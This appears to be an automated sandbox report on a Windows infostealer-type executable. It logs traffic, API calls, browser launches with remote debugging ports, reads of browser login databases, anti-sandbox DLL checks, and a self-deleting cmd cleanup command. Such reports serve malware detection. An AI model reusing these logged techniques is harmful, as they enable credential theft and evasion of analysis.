                  Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49699 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.7:49700 version: TLS 1.2
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00407060 FindFirstFileA,strlen,strlen,memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,lstrcpyA,strlen,Sleep,??3@YAXPAX@Z,??3@YAXPAX@Z,CreateProcessA,Sleep,strlen,Sleep,strlen,strlen,??3@YAXPAX@Z,CloseDesktop,_invalid_parameter_noinfo_noreturn,0_2_00407060

                  System Summary

                  barindex
                  PE file has a writeable .text section
                  Source: pjthjsdjgjrtavv.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004054A00_2_004054A0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_0041C4500_2_0041C450
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_0041B0B00_2_0041B0B0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_0041A3400_2_0041A340
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_0041DD600_2_0041DD60
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_0041CF700_2_0041CF70
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_0041D3F00_2_0041D3F0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: String function: 00410340 appears 127 times
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: String function: 00404DF0 appears 77 times
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: String function: 004119B0 appears 43 times
                  Source: pjthjsdjgjrtavv.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@68/283@24/17
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00412050 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,Process32Next,OpenProcess,TerminateProcess,CloseHandle,0_2_00412050
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\G04T7X2E.htmJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8308:120:WilError_03
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Users\user~1\AppData\Local\Temp\c25d3b31-8907-418f-b1d0-82aef76c765e.tmpJump to behavior
                  Source: pjthjsdjgjrtavv.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: YM7YMOHLX.0.dr, J5PP8Q9ZU.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: pjthjsdjgjrtavv.exeVirustotal: Detection: 48%
                  Source: pjthjsdjgjrtavv.exeReversingLabs: Detection: 57%
                  Source: unknownProcess created: C:\Users\user\Desktop\pjthjsdjgjrtavv.exe "C:\Users\user\Desktop\pjthjsdjgjrtavv.exe"
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2028,i,10443688959258362392,15587232465003949149,262144 /prefetch:8
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2288 --field-trial-handle=2248,i,213816145862176203,3127195056463773546,262144 /prefetch:3
                  Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:3
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6832 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6980 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:8
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\Z5PPP8Q1NYCB" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=5396 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:8
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\Z5PPP8Q1NYCB" & exitJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2028,i,10443688959258362392,15587232465003949149,262144 /prefetch:8Jump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2288 --field-trial-handle=2248,i,213816145862176203,3127195056463773546,262144 /prefetch:3Jump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:3Jump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6832 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:8Jump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6980 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:8Jump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\Z5PPP8Q1NYCB" & exitJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=5396 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:8Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004188E0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004188E0
                  Source: pjthjsdjgjrtavv.exeStatic PE information: section name: .00cfg

                  Boot Survival

                  barindex
                  Monitors registry run keys for changes
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004188E0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004188E0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: pjthjsdjgjrtavv.exeBinary or memory string: DIR_WATCH.DLL
                  Source: pjthjsdjgjrtavv.exeBinary or memory string: SBIEDLL.DLL
                  Source: pjthjsdjgjrtavv.exeBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                  Source: pjthjsdjgjrtavv.exeBinary or memory string: API_LOG.DLL
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeEvaded block: after key decisiongraph_0-14792
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-12846
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 3312Thread sleep count: 82 > 30
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
